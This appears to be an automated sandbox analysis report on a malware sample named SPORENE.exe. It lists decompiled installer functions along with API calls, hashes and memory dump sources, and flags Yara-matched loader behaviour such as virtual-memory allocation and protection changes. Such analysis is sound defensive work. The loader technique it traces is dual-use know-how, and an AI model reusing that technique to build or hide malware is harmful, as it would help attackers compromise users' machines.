                • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                				int _t15;
                				long _t16;
                
                				_t15 = _a8;
                				if(_t15 != 0x102) {
                					if(_t15 != 0x200) {
                						_t16 = _a16;
                						L7:
                						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
                							_push(_t16);
                							_push(6);
                							 *0x42d254 = _t16;
                							E00404ED4();
                						}
                						L11:
                						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
                					}
                					if(IsWindowVisible(_a4) == 0) {
                						L10:
                						_t16 = _a16;
                						goto L11;
                					}
                					_t16 = E00404E54(_a4, 1);
                					_t15 = 0x419;
                					goto L7;
                				}
                				if(_a12 != 0x20) {
                					goto L10;
                				}
                				E004044E5(0x413);
                				return 0;
                			}





                0x00405517
                0x00405521
                0x0040553d
                0x0040555f
                0x00405562
                0x00405568
                0x00405572
                0x00405573
                0x00405575
                0x0040557b
                0x0040557b
                0x00405585
                0x00000000
                0x00405593
                0x0040554a
                0x00405582
                0x00405582
                0x00000000
                0x00405582
                0x00405556
                0x00405558
                0x00000000
                0x00405558
                0x00405527
                0x00000000
                0x00000000
                0x0040552e
                0x00000000

                APIs
                • IsWindowVisible.USER32(?), ref: 00405542
                • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                  • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Window$CallMessageProcSendVisible
                • String ID:
                • API String ID: 3748168415-3916222277
                • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                				int _v8;
                				long _t21;
                				long _t24;
                				char* _t30;
                
                				asm("sbb eax, eax");
                				_v8 = 0x800;
                				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                				_t30 = _a16;
                				if(_t21 != 0) {
                					L4:
                					 *_t30 =  *_t30 & 0x00000000;
                				} else {
                					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                					_t21 = RegCloseKey(_a20);
                					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                						goto L4;
                					}
                				}
                				return _t21;
                			}







                0x00406419
                0x0040641b
                0x00406433
                0x00406438
                0x0040643d
                0x0040647b
                0x0040647b
                0x0040643f
                0x00406451
                0x0040645c
                0x00406462
                0x0040646d
                0x00000000
                0x00000000
                0x0040646d
                0x00406481

                APIs
                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,0042C248,00000000,?,?,C:\Users\user\AppData\Local\Temp\SPORENE.exe,?,?,00406672,80000002), ref: 00406451
                • RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Local\Temp\SPORENE.exe,C:\Users\user\AppData\Local\Temp\SPORENE.exe,C:\Users\user\AppData\Local\Temp\SPORENE.exe,00000000,0042C248), ref: 0040645C
                Strings
                • C:\Users\user\AppData\Local\Temp\SPORENE.exe, xrefs: 00406412
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CloseQueryValue
                • String ID: C:\Users\user\AppData\Local\Temp\SPORENE.exe
                • API String ID: 3356406503-4160804946
                • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00403B57() {
                				void* _t2;
                				void* _t3;
                				void* _t6;
                				void* _t8;
                
                				_t8 =  *0x42b22c;
                				_t3 = E00403B3C(_t2, 0);
                				if(_t8 != 0) {
                					do {
                						_t6 = _t8;
                						_t8 =  *_t8;
                						FreeLibrary( *(_t6 + 8));
                						_t3 = GlobalFree(_t6);
                					} while (_t8 != 0);
                				}
                				 *0x42b22c =  *0x42b22c & 0x00000000;
                				return _t3;
                			}







                0x00403b58
                0x00403b60
                0x00403b67
                0x00403b6a
                0x00403b6a
                0x00403b6c
                0x00403b71
                0x00403b78
                0x00403b7e
                0x00403b82
                0x00403b83
                0x00403b8b

                APIs
                • FreeLibrary.KERNEL32(?,747DFAA0,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                • GlobalFree.KERNEL32 ref: 00403B78
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Free$GlobalLibrary
                • String ID: C:\Users\user\AppData\Local\Temp\
                • API String ID: 1100898210-3936084776
                • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 77%
                			E00405E58(WCHAR* _a4) {
                				WCHAR* _t5;
                				WCHAR* _t7;
                
                				_t7 = _a4;
                				_t5 =  &(_t7[lstrlenW(_t7)]);
                				while( *_t5 != 0x5c) {
                					_push(_t5);
                					_push(_t7);
                					_t5 = CharPrevW();
                					if(_t5 > _t7) {
                						continue;
                					}
                					break;
                				}
                				 *_t5 =  *_t5 & 0x00000000;
                				return  &(_t5[1]);
                			}





                0x00405e59
                0x00405e63
                0x00405e66
                0x00405e6c
                0x00405e6d
                0x00405e6e
                0x00405e76
                0x00000000
                0x00000000
                0x00000000
                0x00405e76
                0x00405e78
                0x00405e80

                APIs
                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,00443800,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00405E5E
                • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,00443800,00443800,80000000,00000003), ref: 00405E6E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CharPrevlstrlen
                • String ID: C:\Users\user\Desktop
                • API String ID: 2709904686-3125694417
                • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                • Instruction ID: d2786f61c86b799b8b6ecf14661ff9643eaf9d362a95097130d0805b1e4d2bc4
                • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                • Instruction Fuzzy Hash: 36D0A7B3410D20DAC3126718DC04DAF73ECFF6134074A442AF481A71A4D7785E8186ED
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
                				int _v8;
                				int _t12;
                				int _t14;
                				int _t15;
                				CHAR* _t17;
                				CHAR* _t27;
                
                				_t12 = lstrlenA(_a8);
                				_t27 = _a4;
                				_v8 = _t12;
                				while(lstrlenA(_t27) >= _v8) {
                					_t14 = _v8;
                					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                					_t15 = lstrcmpiA(_t27, _a8);
                					_t27[_v8] =  *(_t14 + _t27);
                					if(_t15 == 0) {
                						_t17 = _t27;
                					} else {
                						_t27 = CharNextA(_t27);
                						continue;
                					}
                					L5:
                					return _t17;
                				}
                				_t17 = 0;
                				goto L5;
                			}









                0x00405fa2
                0x00405fa4
                0x00405fa7
                0x00405fd3
                0x00405fac
                0x00405fb5
                0x00405fba
                0x00405fc5
                0x00405fc8
                0x00405fe4
                0x00405fca
                0x00405fd1
                0x00000000
                0x00405fd1
                0x00405fdd
                0x00405fe1
                0x00405fe1
                0x00405fdb
                0x00000000

                APIs
                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBA
                • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: lstrlen$CharNextlstrcmpi
                • String ID:
                • API String ID: 190613189-0
                • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                Uniqueness

                Uniqueness Score: -1.00%

                Executed Functions

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.626101047.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.626092351.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000002.00000002.626152222.0000000000421000.00000004.00020000.sdmp Download File
                • Associated: 00000002.00000002.626169415.0000000000422000.00000002.00020000.sdmp Download File
                • Associated: 00000002.00000002.626339782.0000000001853000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: #100
                • String ID: VB5!6%*
                • API String ID: 1341478452-4246263594
                • Opcode ID: 49ca7899a6d604be6bf3442c12e22db80400758bd1cb62f159e8631ee4b9eb49
                • Instruction ID: d75cae8dad3e15aafd6d97e108f4f9e1e4e5bc980460d590f2dde34121b0546a
                • Opcode Fuzzy Hash: 49ca7899a6d604be6bf3442c12e22db80400758bd1cb62f159e8631ee4b9eb49
                • Instruction Fuzzy Hash: A462BA3115968A8FDB03DF38CAA5951FFB0FE2271032A1797D4948B1A3D324F56ACB52
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Executed Functions

                APIs
                  • Part of subcall function 0130FE24: LoadLibraryA.KERNELBASE(6119438F), ref: 013100EB
                • NtAllocateVirtualMemory.NTDLL ref: 0130C8F2
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.626110069.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false
                Yara matches
                Similarity
                • API ID: AllocateLibraryLoadMemoryVirtual
                • String ID: {
                • API String ID: 2616484454-366298937
                • Opcode ID: 9b49b23e4c7a18f46f1b9c42e7d37e70e24f3e2c5744d5ff1bdc47f54943f688
                • Instruction ID: f987189cf873475c73aa5814469b236ab6298b39a84d3bd2433042aefd32d1cf
                • Opcode Fuzzy Hash: 9b49b23e4c7a18f46f1b9c42e7d37e70e24f3e2c5744d5ff1bdc47f54943f688
                • Instruction Fuzzy Hash: 6051743510834ACFDB319F28CC653EA7BE5AF5A3A8F45066DCCCA9B590D3705981CB46
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAddVectoredExceptionHandler.NTDLL ref: 013144C3
                Memory Dump Source
                • Source File: 0000000A.00000002.626110069.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false
                Yara matches
                Similarity
                • API ID: ExceptionHandlerVectored
                • String ID:
                • API String ID: 3310709589-0
                • Opcode ID: 9ebe3133fe02f7034a063b5eb362a2b5ad660299a2431f0743cb6a49cf7c6123
                • Instruction ID: b5356fdc15028e2109ffaff22c0eae8bac5a9658abc5e0584644644cf74f7b23
                • Opcode Fuzzy Hash: 9ebe3133fe02f7034a063b5eb362a2b5ad660299a2431f0743cb6a49cf7c6123
                • Instruction Fuzzy Hash: DF91593160834DCFDF7D8E3889947EA77A6BF54368F45412BCC0B8BA5DD73089458A42
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtProtectVirtualMemory.NTDLL(-4D0ED916,642AAB63,642AAB67,?,642AAB6B,013122FD,-A07819C7,013091CF,-731CA9F9,97C36672), ref: 01313578
                Memory Dump Source
                • Source File: 0000000A.00000002.626110069.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false
                Yara matches
                Similarity
                • API ID: MemoryProtectVirtual
                • String ID:
                • API String ID: 2706961497-0
                • Opcode ID: 8ee12220395fb1947fa40ad3cb744629b557ab6ff8f255423d61304db694df4a
                • Instruction ID: ba628498823a48074b6a950e57e9eea4b4109f8475a70000f8e02359958a3490
                • Opcode Fuzzy Hash: 8ee12220395fb1947fa40ad3cb744629b557ab6ff8f255423d61304db694df4a
                • Instruction Fuzzy Hash: CA119EB174424A9FDB75CE5CCC84BEE37EAEBA8314F448429D849DB708C630DA09CA21
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.626110069.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false
                Yara matches
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: b8c8fc2399edeb14e19383b279e9b97e01f6251faf82b125935d73a92a14a1a3
                • Instruction ID: 5c97fbcb7959da9841c73f6f4d8a2484cf9f50747c6dac4cbd7cb620d81903f7
                • Opcode Fuzzy Hash: b8c8fc2399edeb14e19383b279e9b97e01f6251faf82b125935d73a92a14a1a3
                • Instruction Fuzzy Hash: 1BE0E5C6A0E2C619CF13E7BC04B82D56FD56F52248B4C40CEE0D20F087C98440AA9792
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryA.KERNELBASE(6119438F), ref: 013100EB
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.626110069.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false
                Yara matches
                Similarity
                • API ID: LibraryLoad
                • String ID: cT
                • API String ID: 1029625771-4248416740
                • Opcode ID: 5279db67f59e53b813dbd14362894e742a6c730e4e853bc8c61b2977f38ad49d
                • Instruction ID: 7c1f34c1e8a8141b7510365e7771b316b15400265c85e8588c4a2756d49fcd83
                • Opcode Fuzzy Hash: 5279db67f59e53b813dbd14362894e742a6c730e4e853bc8c61b2977f38ad49d
                • Instruction Fuzzy Hash: 1A11E47551828CDFCB7D9E188CA87EE33EDAF85718F10411AFC0A8BA84C7744AC08A53
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.626110069.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false
                Yara matches
                Similarity
                • API ID: EnumWindows
                • String ID:
                • API String ID: 1129996299-0
                • Opcode ID: 247cc95f3eee5f9d7acd6edb012ce748e708e7c4fe45999f0ee377138c6bf37c
                • Instruction ID: 12dcd1d2073177ca36145a19d73f47a1e0133a45714a8c6d77ccb2d6060478e2
                • Opcode Fuzzy Hash: 247cc95f3eee5f9d7acd6edb012ce748e708e7c4fe45999f0ee377138c6bf37c
                • Instruction Fuzzy Hash: 51615871509289DFCB27CF34C8996D9BFF5EF16304F1C049EC8468B992D631A946CB81
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.626110069.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false
                Yara matches
                Similarity
                • API ID: EnumWindows
                • String ID:
                • API String ID: 1129996299-0
                • Opcode ID: f7c142fa764784433e4d4e0a725d500a17929baecb9b11ecdf0ac434208bdaa8
                • Instruction ID: 4505878b24e45caad4b4ef3bbac51f8a098f746b8a7da165b6a5b58380adebc3
                • Opcode Fuzzy Hash: f7c142fa764784433e4d4e0a725d500a17929baecb9b11ecdf0ac434208bdaa8
                • Instruction Fuzzy Hash: 493155B10096C8DFDB26CF34C8593D9BFB5EB46304F1C049EC8868B652DA34A945CB82
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.626110069.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false
                Yara matches
                Similarity
                • API ID: LibraryLoadMemoryProtectVirtual
                • String ID: xChm$}U(~$&PM
                • API String ID: 3389902171-3005590319
                • Opcode ID: 5e6e7e7136cbd720136aa023e7c8667970adbcb40218f6c8ab6f04e0e4b74aa9
                • Instruction ID: 4cce6cc72e1f4a80a2572a15c75cb6c7b2a0033503ba190ba7f1b3d38fc4ca91
                • Opcode Fuzzy Hash: 5e6e7e7136cbd720136aa023e7c8667970adbcb40218f6c8ab6f04e0e4b74aa9
                • Instruction Fuzzy Hash: 0C424C31508389CFDF398F3888983DB7BE6AF16364F59815ACC9A8B5DAD3308546C712
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 0000000A.00000002.626110069.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 35eb142829d1851d7ecb37e6b4722999db34030d5cc8404578e5ba66853fa48b
                • Instruction ID: 7b0245ed64acb9ecca4b49d24cc9a1f018f5c376c0685220027c003426766a06
                • Opcode Fuzzy Hash: 35eb142829d1851d7ecb37e6b4722999db34030d5cc8404578e5ba66853fa48b
                • Instruction Fuzzy Hash: 76115E7AA05309CFDB3CCE18C684AE977B6BF58718F558026F9099B669C3309AC4CA10
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 0000000A.00000002.626110069.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                • Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
                • Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                • Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10
                Uniqueness

                Uniqueness Score: -1.00%